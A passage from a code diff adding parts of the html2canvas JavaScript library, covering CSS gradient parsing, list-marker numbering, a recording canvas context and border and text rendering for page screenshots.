+            colorStops: []
+          };
+
+          // get coordinates
+          m2 = m1[2].match(/(\d{1,3})%?\s(\d{1,3})%?/);
+
+          // m2[1] == 0%   -> left
+          // m2[1] == 50%  -> center
+          // m2[1] == 100% -> right
+
+          // m2[2] == 0%   -> top
+          // m2[2] == 50%  -> center
+          // m2[2] == 100% -> bottom
+
+          if(m2){
+            gradient.x0 = (m2[1] * bounds.width) / 100;
+            gradient.y0 = (m2[2] * bounds.height) / 100;
+            gradient.x1 = bounds.width - gradient.x0;
+            gradient.y1 = bounds.height - gradient.y0;
+          }
+
+          // get colors and stops
+          m2 = m1[3].match(/((?:rgb|rgba)\(\d{1,3},\s\d{1,3},\s\d{1,3}(?:,\s[0-9\.]+)?\)(?:\s\d{1,3}%)?)+/g);
+          if(m2){
+            m2Len = m2.length;
+            step = 1 / Math.max(m2Len - 1, 1);
+            for(i = 0; i < m2Len; i+=1){
+              m3 = m2[i].match(/((?:rgb|rgba)\(\d{1,3},\s\d{1,3},\s\d{1,3}(?:,\s[0-9\.]+)?\))\s*(\d{1,3})?(%)?/);
+              if(m3[2]){
+                stop = parseFloat(m3[2]);
+                if(m3[3]){ // percentage
+                  stop /= 100;
+                }
+              } else {
+                stop = i * step;
+              }
+              gradient.colorStops.push({
+                color: m3[1],
+                stop: stop
+              });
+            }
+          }
+          break;
+
+        case '-webkit-radial-gradient':
+        case '-moz-radial-gradient':
+        case '-o-radial-gradient':
+
+          gradient = {
+            type: 'circle',
+            x0: 0,
+            y0: 0,
+            x1: bounds.width,
+            y1: bounds.height,
+            cx: 0,
+            cy: 0,
+            rx: 0,
+            ry: 0,
+            colorStops: []
+          };
+
+          // center
+          m2 = m1[2].match(/(\d{1,3})%?\s(\d{1,3})%?/);
+          if(m2){
+            gradient.cx = (m2[1] * bounds.width) / 100;
+            gradient.cy = (m2[2] * bounds.height) / 100;
+          }
+
+          // size
+          m2 = m1[3].match(/\w+/);
+          m3 = m1[4].match(/[a-z\-]*/);
+          if(m2 && m3){
+            switch(m3[0]){
+              case 'farthest-corner':
+              case 'cover': // is equivalent to farthest-corner
+              case '': // mozilla removes "cover" from definition :(
+                tl = Math.sqrt(Math.pow(gradient.cx, 2) + Math.pow(gradient.cy, 2));
+                tr = Math.sqrt(Math.pow(gradient.cx, 2) + Math.pow(gradient.y1 - gradient.cy, 2));
+                br = Math.sqrt(Math.pow(gradient.x1 - gradient.cx, 2) + Math.pow(gradient.y1 - gradient.cy, 2));
+                bl = Math.sqrt(Math.pow(gradient.x1 - gradient.cx, 2) + Math.pow(gradient.cy, 2));
+                gradient.rx = gradient.ry = Math.max(tl, tr, br, bl);
+                break;
+              case 'closest-corner':
+                tl = Math.sqrt(Math.pow(gradient.cx, 2) + Math.pow(gradient.cy, 2));
+                tr = Math.sqrt(Math.pow(gradient.cx, 2) + Math.pow(gradient.y1 - gradient.cy, 2));
+                br = Math.sqrt(Math.pow(gradient.x1 - gradient.cx, 2) + Math.pow(gradient.y1 - gradient.cy, 2));
+                bl = Math.sqrt(Math.pow(gradient.x1 - gradient.cx, 2) + Math.pow(gradient.cy, 2));
+                gradient.rx = gradient.ry = Math.min(tl, tr, br, bl);
+                break;
+              case 'farthest-side':
+                if(m2[0] === 'circle'){
+                  gradient.rx = gradient.ry = Math.max(
+                    gradient.cx,
+                    gradient.cy,
+                    gradient.x1 - gradient.cx,
+                    gradient.y1 - gradient.cy
+                    );
+                } else { // ellipse
+
+                  gradient.type = m2[0];
+
+                  gradient.rx = Math.max(
+                    gradient.cx,
+                    gradient.x1 - gradient.cx
+                    );
+                  gradient.ry = Math.max(
+                    gradient.cy,
+                    gradient.y1 - gradient.cy
+                    );
+                }
+                break;
+              case 'closest-side':
+              case 'contain': // is equivalent to closest-side
+                if(m2[0] === 'circle'){
+                  gradient.rx = gradient.ry = Math.min(
+                    gradient.cx,
+                    gradient.cy,
+                    gradient.x1 - gradient.cx,
+                    gradient.y1 - gradient.cy
+                    );
+                } else { // ellipse
+
+                  gradient.type = m2[0];
+
+                  gradient.rx = Math.min(
+                    gradient.cx,
+                    gradient.x1 - gradient.cx
+                    );
+                  gradient.ry = Math.min(
+                    gradient.cy,
+                    gradient.y1 - gradient.cy
+                    );
+                }
+                break;
+
+            // TODO: add support for "30px 40px" sizes (webkit only)
+            }
+          }
+
+          // color stops
+          m2 = m1[5].match(/((?:rgb|rgba)\(\d{1,3},\s\d{1,3},\s\d{1,3}(?:,\s[0-9\.]+)?\)(?:\s\d{1,3}(?:%|px))?)+/g);
+          if(m2){
+            m2Len = m2.length;
+            step = 1 / Math.max(m2Len - 1, 1);
+            for(i = 0; i < m2Len; i+=1){
+              m3 = m2[i].match(/((?:rgb|rgba)\(\d{1,3},\s\d{1,3},\s\d{1,3}(?:,\s[0-9\.]+)?\))\s*(\d{1,3})?(%|px)?/);
+              if(m3[2]){
+                stop = parseFloat(m3[2]);
+                if(m3[3] === '%'){
+                  stop /= 100;
+                } else { // px - stupid opera
+                  stop /= bounds.width;
+                }
+              } else {
+                stop = i * step;
+              }
+              gradient.colorStops.push({
+                color: m3[1],
+                stop: stop
+              });
+            }
+          }
+          break;
+      }
+    }
+
+    return gradient;
+  };
+
+  _html2canvas.Generate.Gradient = function(src, bounds) {
+    if(bounds.width === 0 || bounds.height === 0) {
+      return;
+    }
+
+    var canvas = document.createElement('canvas'),
+    ctx = canvas.getContext('2d'),
+    gradient, grad, i, len;
+
+    canvas.width = bounds.width;
+    canvas.height = bounds.height;
+
+    // TODO: add support for multi defined background gradients
+    gradient = _html2canvas.Generate.parseGradient(src, bounds);
+
+    if(gradient) {
+      if(gradient.type === 'linear') {
+        grad = ctx.createLinearGradient(gradient.x0, gradient.y0, gradient.x1, gradient.y1);
+
+        for (i = 0, len = gradient.colorStops.length; i < len; i+=1) {
+          try {
+            grad.addColorStop(gradient.colorStops[i].stop, gradient.colorStops[i].color);
+          }
+          catch(e) {
+            h2clog(['failed to add color stop: ', e, '; tried to add: ', gradient.colorStops[i], '; stop: ', i, '; in: ', src]);
+          }
+        }
+
+        ctx.fillStyle = grad;
+        ctx.fillRect(0, 0, bounds.width, bounds.height);
+
+      } else if(gradient.type === 'circle') {
+
+        grad = ctx.createRadialGradient(gradient.cx, gradient.cy, 0, gradient.cx, gradient.cy, gradient.rx);
+
+        for (i = 0, len = gradient.colorStops.length; i < len; i+=1) {
+          try {
+            grad.addColorStop(gradient.colorStops[i].stop, gradient.colorStops[i].color);
+          }
+          catch(e) {
+            h2clog(['failed to add color stop: ', e, '; tried to add: ', gradient.colorStops[i], '; stop: ', i, '; in: ', src]);
+          }
+        }
+
+        ctx.fillStyle = grad;
+        ctx.fillRect(0, 0, bounds.width, bounds.height);
+
+      } else if(gradient.type === 'ellipse') {
+
+        // draw circle
+        var canvasRadial = document.createElement('canvas'),
+        ctxRadial = canvasRadial.getContext('2d'),
+        ri = Math.max(gradient.rx, gradient.ry),
+        di = ri * 2, imgRadial;
+
+        canvasRadial.width = canvasRadial.height = di;
+
+        grad = ctxRadial.createRadialGradient(gradient.rx, gradient.ry, 0, gradient.rx, gradient.ry, ri);
+
+        for (i = 0, len = gradient.colorStops.length; i < len; i+=1) {
+          try {
+            grad.addColorStop(gradient.colorStops[i].stop, gradient.colorStops[i].color);
+          }
+          catch(e) {
+            h2clog(['failed to add color stop: ', e, '; tried to add: ', gradient.colorStops[i], '; stop: ', i, '; in: ', src]);
+          }
+        }
+
+        ctxRadial.fillStyle = grad;
+        ctxRadial.fillRect(0, 0, di, di);
+
+        ctx.fillStyle = gradient.colorStops[i - 1].color;
+        ctx.fillRect(0, 0, canvas.width, canvas.height);
+        ctx.drawImage(canvasRadial, gradient.cx - gradient.rx, gradient.cy - gradient.ry, 2 * gradient.rx, 2 * gradient.ry);
+
+      }
+    }
+
+    return canvas;
+  };
+
+  _html2canvas.Generate.ListAlpha = function(number) {
+    var tmp = "",
+    modulus;
+
+    do {
+      modulus = number % 26;
+      tmp = String.fromCharCode((modulus) + 64) + tmp;
+      number = number / 26;
+    }while((number*26) > 26);
+
+    return tmp;
+  };
+
+  _html2canvas.Generate.ListRoman = function(number) {
+    var romanArray = ["M", "CM", "D", "CD", "C", "XC", "L", "XL", "X", "IX", "V", "IV", "I"],
+    decimal = [1000, 900, 500, 400, 100, 90, 50, 40, 10, 9, 5, 4, 1],
+    roman = "",
+    v,
+    len = romanArray.length;
+
+    if (number <= 0 || number >= 4000) {
+      return number;
+    }
+
+    for (v=0; v < len; v+=1) {
+      while (number >= decimal[v]) {
+        number -= decimal[v];
+        roman += romanArray[v];
+      }
+    }
+
+    return roman;
+
+  };
+
+})();
+function h2cRenderContext(width, height) {
+  var storage = [];
+  return {
+    storage: storage,
+    width: width,
+    height: height,
+    clip: function() {
+      storage.push({
+        type: "function",
+        name: "clip",
+        'arguments': arguments
+      });
+    },
+    translate: function() {
+      storage.push({
+        type: "function",
+        name: "translate",
+        'arguments': arguments
+      });
+    },
+    fill: function() {
+      storage.push({
+        type: "function",
+        name: "fill",
+        'arguments': arguments
+      });
+    },
+    save: function() {
+      storage.push({
+        type: "function",
+        name: "save",
+        'arguments': arguments
+      });
+    },
+    restore: function() {
+      storage.push({
+        type: "function",
+        name: "restore",
+        'arguments': arguments
+      });
+    },
+    fillRect: function () {
+      storage.push({
+        type: "function",
+        name: "fillRect",
+        'arguments': arguments
+      });
+    },
+    createPattern: function() {
+      storage.push({
+        type: "function",
+        name: "createPattern",
+        'arguments': arguments
+      });
+    },
+    drawShape: function() {
+
+      var shape = [];
+
+      storage.push({
+        type: "function",
+        name: "drawShape",
+        'arguments': shape
+      });
+
+      return {
+        moveTo: function() {
+          shape.push({
+            name: "moveTo",
+            'arguments': arguments
+          });
+        },
+        lineTo: function() {
+          shape.push({
+            name: "lineTo",
+            'arguments': arguments
+          });
+        },
+        arcTo: function() {
+          shape.push({
+            name: "arcTo",
+            'arguments': arguments
+          });
+        },
+        bezierCurveTo: function() {
+          shape.push({
+            name: "bezierCurveTo",
+            'arguments': arguments
+          });
+        },
+        quadraticCurveTo: function() {
+          shape.push({
+            name: "quadraticCurveTo",
+            'arguments': arguments
+          });
+        }
+      };
+
+    },
+    drawImage: function () {
+      storage.push({
+        type: "function",
+        name: "drawImage",
+        'arguments': arguments
+      });
+    },
+    fillText: function () {
+      storage.push({
+        type: "function",
+        name: "fillText",
+        'arguments': arguments
+      });
+    },
+    setVariable: function (variable, value) {
+      storage.push({
+        type: "variable",
+        name: variable,
+        'arguments': value
+      });
+    }
+  };
+}
+_html2canvas.Parse = function (images, options) {
+  window.scroll(0,0);
+
+  var element = (( options.elements === undefined ) ? document.body : options.elements[0]), // select body by default
+  numDraws = 0,
+  doc = element.ownerDocument,
+  support = _html2canvas.Util.Support(options, doc),
+  ignoreElementsRegExp = new RegExp("(" + options.ignoreElements + ")"),
+  body = doc.body,
+  getCSS = _html2canvas.Util.getCSS,
+  pseudoHide = "___html2canvas___pseudoelement",
+  hidePseudoElements = doc.createElement('style');
+
+  hidePseudoElements.innerHTML = '.' + pseudoHide + '-before:before { content: "" !important; display: none !important; }' +
+  '.' + pseudoHide + '-after:after { content: "" !important; display: none !important; }';
+
+  body.appendChild(hidePseudoElements);
+
+  images = images || {};
+
+  function documentWidth () {
+    return Math.max(
+      Math.max(doc.body.scrollWidth, doc.documentElement.scrollWidth),
+      Math.max(doc.body.offsetWidth, doc.documentElement.offsetWidth),
+      Math.max(doc.body.clientWidth, doc.documentElement.clientWidth)
+      );
+  }
+
+  function documentHeight () {
+    return Math.max(
+      Math.max(doc.body.scrollHeight, doc.documentElement.scrollHeight),
+      Math.max(doc.body.offsetHeight, doc.documentElement.offsetHeight),
+      Math.max(doc.body.clientHeight, doc.documentElement.clientHeight)
+      );
+  }
+
+  function getCSSInt(element, attribute) {
+    var val = parseInt(getCSS(element, attribute), 10);
+    return (isNaN(val)) ? 0 : val; // borders in old IE are throwing 'medium' for demo.html
+  }
+
+  function renderRect (ctx, x, y, w, h, bgcolor) {
+    if (bgcolor !== "transparent"){
+      ctx.setVariable("fillStyle", bgcolor);
+      ctx.fillRect(x, y, w, h);
+      numDraws+=1;
+    }
+  }
+
+  function textTransform (text, transform) {
+    switch(transform){
+      case "lowercase":
+        return text.toLowerCase();
+      case "capitalize":
+        return text.replace( /(^|\s|:|-|\(|\))([a-z])/g , function (m, p1, p2) {
+          if (m.length > 0) {
+            return p1 + p2.toUpperCase();
+          }
+        } );
+      case "uppercase":
+        return text.toUpperCase();
+      default:
+        return text;
+    }
+  }
+
+  function noLetterSpacing(letter_spacing) {
+    return (/^(normal|none|0px)$/.test(letter_spacing));
+  }
+
+  function drawText(currentText, x, y, ctx){
+    if (currentText !== null && _html2canvas.Util.trimText(currentText).length > 0) {
+      ctx.fillText(currentText, x, y);
+      numDraws+=1;
+    }
+  }
+
+  function setTextVariables(ctx, el, text_decoration, color) {
+    var align = false,
+    bold = getCSS(el, "fontWeight"),
+    family = getCSS(el, "fontFamily"),
+    size = getCSS(el, "fontSize");
+
+    switch(parseInt(bold, 10)){
+      case 401:
+        bold = "bold";
+        break;
+      case 400:
+        bold = "normal";
+        break;
+    }
+
+    ctx.setVariable("fillStyle", color);
+    ctx.setVariable("font", [getCSS(el, "fontStyle"), getCSS(el, "fontVariant"), bold, size, family].join(" "));
+    ctx.setVariable("textAlign", (align) ? "right" : "left");
+
+    if (text_decoration !== "none"){
+      return _html2canvas.Util.Font(family, size, doc);
+    }
+  }
+
+  function renderTextDecoration(ctx, text_decoration, bounds, metrics, color) {
+    switch(text_decoration) {
+      case "underline":
+        // Draws a line at the baseline of the font
+        // TODO As some browsers display the line as more than 1px if the font-size is big, need to take that into account both in position and size
+        renderRect(ctx, bounds.left, Math.round(bounds.top + metrics.baseline + metrics.lineWidth), bounds.width, 1, color);
+        break;
+      case "overline":
+        renderRect(ctx, bounds.left, Math.round(bounds.top), bounds.width, 1, color);
+        break;
+      case "line-through":
+        // TODO try and find exact position for line-through
+        renderRect(ctx, bounds.left, Math.ceil(bounds.top + metrics.middle + metrics.lineWidth), bounds.width, 1, color);
+        break;
+    }
+  }
+
+  function getTextBounds(state, text, textDecoration, isLast) {
+    var bounds;
+    if (support.rangeBounds) {
+      if (textDecoration !== "none" || _html2canvas.Util.trimText(text).length !== 0) {
+        bounds = textRangeBounds(text, state.node, state.textOffset);
+      }
+      state.textOffset += text.length;
+    } else if (state.node && typeof state.node.nodeValue === "string" ){
+      var newTextNode = (isLast) ? state.node.splitText(text.length) : null;
+      bounds = textWrapperBounds(state.node);
+      state.node = newTextNode;
+    }
+    return bounds;
+  }
+
+  function textRangeBounds(text, textNode, textOffset) {
+    var range = doc.createRange();
+    range.setStart(textNode, textOffset);
+    range.setEnd(textNode, textOffset + text.length);
+    return range.getBoundingClientRect();
+  }
+
+  function textWrapperBounds(oldTextNode) {
+    var parent = oldTextNode.parentNode,
+    wrapElement = doc.createElement('wrapper'),
+    backupText = oldTextNode.cloneNode(true);
+
+    wrapElement.appendChild(oldTextNode.cloneNode(true));
+    parent.replaceChild(wrapElement, oldTextNode);
+
+    var bounds = _html2canvas.Util.Bounds(wrapElement);
+    parent.replaceChild(backupText, wrapElement);
+    return bounds;
+  }
+
+  function renderText(el, textNode, stack) {
+    var ctx = stack.ctx,
+    color = getCSS(el, "color"),
+    textDecoration = getCSS(el, "textDecoration"),
+    textAlign = getCSS(el, "textAlign"),
+    metrics,
+    textList,
+    state = {
+      node: textNode,
+      textOffset: 0
+    };
+
+    if (_html2canvas.Util.trimText(textNode.nodeValue).length > 0) {
+      textNode.nodeValue = textTransform(textNode.nodeValue, getCSS(el, "textTransform"));
+      textAlign = textAlign.replace(["-webkit-auto"],["auto"]);
+
+      textList = (!options.letterRendering && /^(left|right|justify|auto)$/.test(textAlign) && noLetterSpacing(getCSS(el, "letterSpacing"))) ?
+      textNode.nodeValue.split(/(\b| )/)
+      : textNode.nodeValue.split("");
+
+      metrics = setTextVariables(ctx, el, textDecoration, color);
+
+      if (options.chinese) {
+        textList.forEach(function(word, index) {
+          if (/.*[\u4E00-\u9FA5].*$/.test(word)) {
+            word = word.split("");
+            word.unshift(index, 1);
+            textList.splice.apply(textList, word);
+          }
+        });
+      }
+
+      textList.forEach(function(text, index) {
+        var bounds = getTextBounds(state, text, textDecoration, (index < textList.length - 1));
+        if (bounds) {
+          drawText(text, bounds.left, bounds.bottom, ctx);
+          renderTextDecoration(ctx, textDecoration, bounds, metrics, color);
+        }
+      });
+    }
+  }
+
+  function listPosition (element, val) {
+    var boundElement = doc.createElement( "boundelement" ),
+    originalType,
+    bounds;
+
+    boundElement.style.display = "inline";
+
+    originalType = element.style.listStyleType;
+    element.style.listStyleType = "none";
+
+    boundElement.appendChild(doc.createTextNode(val));
+
+    element.insertBefore(boundElement, element.firstChild);
+
+    bounds = _html2canvas.Util.Bounds(boundElement);
+    element.removeChild(boundElement);
+    element.style.listStyleType = originalType;
+    return bounds;
+  }
+
+  function elementIndex( el ) {
+    var i = -1,
+    count = 1,
+    childs = el.parentNode.childNodes;
+
+    if (el.parentNode) {
+      while( childs[ ++i ] !== el ) {
+        if ( childs[ i ].nodeType === 1 ) {
+          count++;
+        }
+      }
+      return count;
+    } else {
+      return -1;
+    }
+  }
+
+  function listItemText(element, type) {
+    var currentIndex = elementIndex(element),
+    text;
+    switch(type){
+      case "decimal":
+        text = currentIndex;
+        break;
+      case "decimal-leading-zero":
+        text = (currentIndex.toString().length === 1) ? currentIndex = "0" + currentIndex.toString() : currentIndex.toString();
+        break;
+      case "upper-roman":
+        text = _html2canvas.Generate.ListRoman( currentIndex );
+        break;
+      case "lower-roman":
+        text = _html2canvas.Generate.ListRoman( currentIndex ).toLowerCase();
+        break;
+      case "lower-alpha":
+        text = _html2canvas.Generate.ListAlpha( currentIndex ).toLowerCase();
+        break;
+      case "upper-alpha":
+        text = _html2canvas.Generate.ListAlpha( currentIndex );
+        break;
+    }
+
+    text += ". ";
+    return text;
+  }
+
+  function renderListItem(element, stack, elBounds) {
+    var x,
+    text,
+    ctx = stack.ctx,
+    type = getCSS(element, "listStyleType"),
+    listBounds;
+
+    if (/^(decimal|decimal-leading-zero|upper-alpha|upper-latin|upper-roman|lower-alpha|lower-greek|lower-latin|lower-roman)$/i.test(type)) {
+      text = listItemText(element, type);
+      listBounds = listPosition(element, text);
+      setTextVariables(ctx, element, "none", getCSS(element, "color"));
+
+      if (getCSS(element, "listStylePosition") === "inside") {
+        ctx.setVariable("textAlign", "left");
+        x = elBounds.left;
+      } else {
+        return;
+      }
+
+      drawText(text, x, listBounds.bottom, ctx);
+    }
+  }
+
+  function loadImage (src){
+    var img = images[src];
+    if (img && img.succeeded === true) {
+      return img.img;
+    } else {
+      return false;
+    }
+  }
+
+  function clipBounds(src, dst){
+    var x = Math.max(src.left, dst.left),
+    y = Math.max(src.top, dst.top),
+    x2 = Math.min((src.left + src.width), (dst.left + dst.width)),
+    y2 = Math.min((src.top + src.height), (dst.top + dst.height));
+
+    return {
+      left:x,
+      top:y,
+      width:x2-x,
+      height:y2-y
+    };
+  }
+
+  function setZ(zIndex, parentZ){
+    // TODO fix static elements overlapping relative/absolute elements under same stack, if they are defined after them
+    var newContext;
+    if (!parentZ){
+      newContext = h2czContext(0);
+      return newContext;
+    }
+
+    if (zIndex !== "auto"){
+      newContext = h2czContext(zIndex);
+      parentZ.children.push(newContext);
+      return newContext;
+
+    }
+
+    return parentZ;
+  }
+
+  function renderImage(ctx, element, image, bounds, borders) {
+
+    var paddingLeft = getCSSInt(element, 'paddingLeft'),
+    paddingTop = getCSSInt(element, 'paddingTop'),
+    paddingRight = getCSSInt(element, 'paddingRight'),
+    paddingBottom = getCSSInt(element, 'paddingBottom');
+
+    drawImage(
+      ctx,
+      image,
+      0, //sx
+      0, //sy
+      image.width, //sw
+      image.height, //sh
+      bounds.left + paddingLeft + borders[3].width, //dx
+      bounds.top + paddingTop + borders[0].width, // dy
+      bounds.width - (borders[1].width + borders[3].width + paddingLeft + paddingRight), //dw
+      bounds.height - (borders[0].width + borders[2].width + paddingTop + paddingBottom) //dh
+      );
+  }
+
+  function getBorderData(element) {
+    return ["Top", "Right", "Bottom", "Left"].map(function(side) {
+      return {
+        width: getCSSInt(element, 'border' + side + 'Width'),
+        color: getCSS(element, 'border' + side + 'Color')
+      };
+    });
+  }
+
+  function getBorderRadiusData(element) {
+    return ["TopLeft", "TopRight", "BottomRight", "BottomLeft"].map(function(side) {
+      return getCSS(element, 'border' + side + 'Radius');
+    });
+  }
+
+  var getCurvePoints = (function(kappa) {
+
+    return function(x, y, r1, r2) {
+      var ox = (r1) * kappa, // control point offset horizontal
+      oy = (r2) * kappa, // control point offset vertical
+      xm = x + r1, // x-middle
+      ym = y + r2; // y-middle
+      return {
+        topLeft: bezierCurve({
+          x:x,
+          y:ym
+        }, {
+          x:x,
+          y:ym - oy
+        }, {
+          x:xm - ox,
+          y:y
+        }, {
+          x:xm,
+          y:y
+        }),
+        topRight: bezierCurve({
+          x:x,
+          y:y
+        }, {
+          x:x + ox,
+          y:y
+        }, {
+          x:xm,
+          y:ym - oy
+        }, {
+          x:xm,
+          y:ym
+        }),
+        bottomRight: bezierCurve({
+          x:xm,
+          y:y
+        }, {
+          x:xm,
+          y:y + oy
+        }, {
+          x:x + ox,
+          y:ym
+        }, {
+          x:x,
+          y:ym
+        }),
+        bottomLeft: bezierCurve({
+          x:xm,
+          y:ym
+        }, {
+          x:xm - ox,
+          y:ym
+        }, {
+          x:x,
+          y:y + oy
+        }, {
+          x:x,
+          y:y
+        })
+      };
+    };
+  })(4 * ((Math.sqrt(2) - 1) / 3));
+
+  function bezierCurve(start, startControl, endControl, end) {
+
+    var lerp = function (a, b, t) {
+      return {
+        x:a.x + (b.x - a.x) * t,
+        y:a.y + (b.y - a.y) * t
+      };
+    };
+
+    return {
+      start: start,
+      startControl: startControl,
+      endControl: endControl,
+      end: end,
+      subdivide: function(t) {
+        var ab = lerp(start, startControl, t),
+        bc = lerp(startControl, endControl, t),
+        cd = lerp(endControl, end, t),
+        abbc = lerp(ab, bc, t),
+        bccd = lerp(bc, cd, t),
+        dest = lerp(abbc, bccd, t);
+        return [bezierCurve(start, ab, abbc, dest), bezierCurve(dest, bccd, cd, end)];
+      },
+      curveTo: function(borderArgs) {
+        borderArgs.push(["bezierCurve", startControl.x, startControl.y, endControl.x, endControl.y, end.x, end.y]);
+      },
+      curveToReversed: function(borderArgs) {
+        borderArgs.push(["bezierCurve", endControl.x, endControl.y, startControl.x, startControl.y, start.x, start.y]);
+      }
+    };
+  }
+
+  function parseCorner(borderArgs, radius1, radius2, corner1, corner2, x, y) {
+    if (radius1[0] > 0 || radius1[1] > 0) {
+      borderArgs.push(["line", corner1[0].start.x, corner1[0].start.y]);
+      corner1[0].curveTo(borderArgs);
+      corner1[1].curveTo(borderArgs);
+    } else {
+      borderArgs.push(["line", x, y]);
+    }
+
+    if (radius2[0] > 0 || radius2[1] > 0) {
+      borderArgs.push(["line", corner2[0].start.x, corner2[0].start.y]);
+    }
+  }
+
+  function drawSide(borderData, radius1, radius2, outer1, inner1, outer2, inner2) {
+    var borderArgs = [];
+
+    if (radius1[0] > 0 || radius1[1] > 0) {
+      borderArgs.push(["line", outer1[1].start.x, outer1[1].start.y]);
+      outer1[1].curveTo(borderArgs);
+    } else {
+      borderArgs.push([ "line", borderData.c1[0], borderData.c1[1]]);
+    }
+
+    if (radius2[0] > 0 || radius2[1] > 0) {
+      borderArgs.push(["line", outer2[0].start.x, outer2[0].start.y]);
+      outer2[0].curveTo(borderArgs);
+      borderArgs.push(["line", inner2[0].end.x, inner2[0].end.y]);
+      inner2[0].curveToReversed(borderArgs);
+    } else {
+      borderArgs.push([ "line", borderData.c2[0], borderData.c2[1]]);
+      borderArgs.push([ "line", borderData.c3[0], borderData.c3[1]]);
+    }
+
+    if (radius1[0] > 0 || radius1[1] > 0) {
+      borderArgs.push(["line", inner1[1].end.x, inner1[1].end.y]);
+      inner1[1].curveToReversed(borderArgs);
+    } else {
+      borderArgs.push([ "line", borderData.c4[0], borderData.c4[1]]);
+    }
+
+    return borderArgs;
+  }
+
+  function calculateCurvePoints(bounds, borderRadius, borders) {
+
+    var x = bounds.left,
+    y = bounds.top,
+    width = bounds.width,
+    height = bounds.height,
+
+    tlh = borderRadius[0][0],
+    tlv = borderRadius[0][1],
+    trh = borderRadius[1][0],
+    trv = borderRadius[1][1],
+    brv = borderRadius[2][0],
+    brh = borderRadius[2][1],
+    blh = borderRadius[3][0],
+    blv = borderRadius[3][1],
+
+    topWidth = width - trh,
+    rightHeight = height - brv,
+    bottomWidth = width - brh,
+    leftHeight = height - blv;
+
+    return {
+      topLeftOuter: getCurvePoints(
+        x,
+        y,
+        tlh,
+        tlv
+        ).topLeft.subdivide(0.5),
+
+      topLeftInner: getCurvePoints(
+        x + borders[3].width,
+        y + borders[0].width,
+        Math.max(0, tlh - borders[3].width),
+        Math.max(0, tlv - borders[0].width)
+        ).topLeft.subdivide(0.5),
+
+      topRightOuter: getCurvePoints(
+        x + topWidth,
+        y,
+        trh,
+        trv
+        ).topRight.subdivide(0.5),
+
+      topRightInner: getCurvePoints(
+        x + Math.min(topWidth, width + borders[3].width),
+        y + borders[0].width,
+        (topWidth > width + borders[3].width) ? 0 :trh - borders[3].width,
+        trv - borders[0].width
+        ).topRight.subdivide(0.5),
+
+      bottomRightOuter: getCurvePoints(
+        x + bottomWidth,
+        y + rightHeight,
+        brh,
+        brv
+        ).bottomRight.subdivide(0.5),
+
+      bottomRightInner: getCurvePoints(
+        x + Math.min(bottomWidth, width + borders[3].width),
+        y + Math.min(rightHeight, height + borders[0].width),
+        Math.max(0, brh - borders[1].width),
+        Math.max(0, brv - borders[2].width)
+        ).bottomRight.subdivide(0.5),
+
+      bottomLeftOuter: getCurvePoints(
+        x,
+        y + leftHeight,
+        blh,
+        blv
+        ).bottomLeft.subdivide(0.5),
+
+      bottomLeftInner: getCurvePoints(
+        x + borders[3].width,
+        y + leftHeight,
+        Math.max(0, blh - borders[3].width),
+        Math.max(0, blv - borders[2].width)
+        ).bottomLeft.subdivide(0.5)
+    };
+  }
+
+  function getBorderClip(element, borderPoints, borders, radius, bounds) {
+    var backgroundClip = getCSS(element, 'backgroundClip'),
+    borderArgs = [];
+
+    switch(backgroundClip) {
+      case "content-box":
+      case "padding-box":
+        parseCorner(borderArgs, radius[0], radius[1], borderPoints.topLeftInner, borderPoints.topRightInner, bounds.left + borders[3].width, bounds.top + borders[0].width);
+        parseCorner(borderArgs, radius[1], radius[2], borderPoints.topRightInner, borderPoints.bottomRightInner, bounds.left + bounds.width - borders[1].width, bounds.top + borders[0].width);
+        parseCorner(borderArgs, radius[2], radius[3], borderPoints.bottomRightInner, borderPoints.bottomLeftInner, bounds.left + bounds.width - borders[1].width, bounds.top + bounds.height - borders[2].width);
+        parseCorner(borderArgs, radius[3], radius[0], borderPoints.bottomLeftInner, borderPoints.topLeftInner, bounds.left + borders[3].width, bounds.top + bounds.height - borders[2].width);
+        break;
+
+      default:
+        parseCorner(borderArgs, radius[0], radius[1], borderPoints.topLeftOuter, borderPoints.topRightOuter, bounds.left, bounds.top);
+        parseCorner(borderArgs, radius[1], radius[2], borderPoints.topRightOuter, borderPoints.bottomRightOuter, bounds.left + bounds.width, bounds.top);
+        parseCorner(borderArgs, radius[2], radius[3], borderPoints.bottomRightOuter, borderPoints.bottomLeftOuter, bounds.left + bounds.width, bounds.top + bounds.height);
+        parseCorner(borderArgs, radius[3], radius[0], borderPoints.bottomLeftOuter, borderPoints.topLeftOuter, bounds.left, bounds.top + bounds.height);
+        break;
+    }
+
+    return borderArgs;
+  }
+
+  function parseBorders(element, bounds, borders){
+    var x = bounds.left,
+    y = bounds.top,
+    width = bounds.width,
+    height = bounds.height,
+    borderSide,
+    bx,
+    by,
+    bw,
+    bh,
+    borderArgs,
+    // http://www.w3.org/TR/css3-background/#the-border-radius
+    borderRadius = getBorderRadiusData(element),
+    borderPoints = calculateCurvePoints(bounds, borderRadius, borders),
+    borderData = {
+      clip: getBorderClip(element, borderPoints, borders, borderRadius, bounds),
+      borders: []
+    };
+
+    for (borderSide = 0; borderSide < 4; borderSide++) {
+
+      if (borders[borderSide].width > 0) {
+        bx = x;
+        by = y;
+        bw = width;
+        bh = height - (borders[2].width);
+
+        switch(borderSide) {
+          case 0:
+            // top border
+            bh = borders[0].width;
+
+            borderArgs = drawSide({
+              c1: [bx, by],
+              c2: [bx + bw, by],
+              c3: [bx + bw - borders[1].width, by + bh],
+              c4: [bx + borders[3].width, by + bh]
+            }, borderRadius[0], borderRadius[1],
+            borderPoints.topLeftOuter, borderPoints.topLeftInner, borderPoints.topRightOuter, borderPoints.topRightInner);
+            break;
+          case 1:
+            // right border
+            bx = x + width - (borders[1].width);
+            bw = borders[1].width;
+
+            borderArgs = drawSide({
+              c1: [bx + bw, by],
+              c2: [bx + bw, by + bh + borders[2].width],
+              c3: [bx, by + bh],
+              c4: [bx, by + borders[0].width]
+            }, borderRadius[1], borderRadius[2],
+            borderPoints.topRightOuter, borderPoints.topRightInner, borderPoints.bottomRightOuter, borderPoints.bottomRightInner);
+            break;
+          case 2:
+            // bottom border
+            by = (by + height) - (borders[2].width);
+            bh = borders[2].width;
+
+            borderArgs = drawSide({
+              c1: [bx + bw, by + bh],
+              c2: [bx, by + bh],
+              c3: [bx + borders[3].width, by],
+              c4: [bx + bw - borders[2].width, by]
+            }, borderRadius[2], borderRadius[3],
+            borderPoints.bottomRightOuter, borderPoints.bottomRightInner, borderPoints.bottomLeftOuter, borderPoints.bottomLeftInner);
+            break;
+          case 3:
+            // left border
+            bw = borders[3].width;
+
+            borderArgs = drawSide({
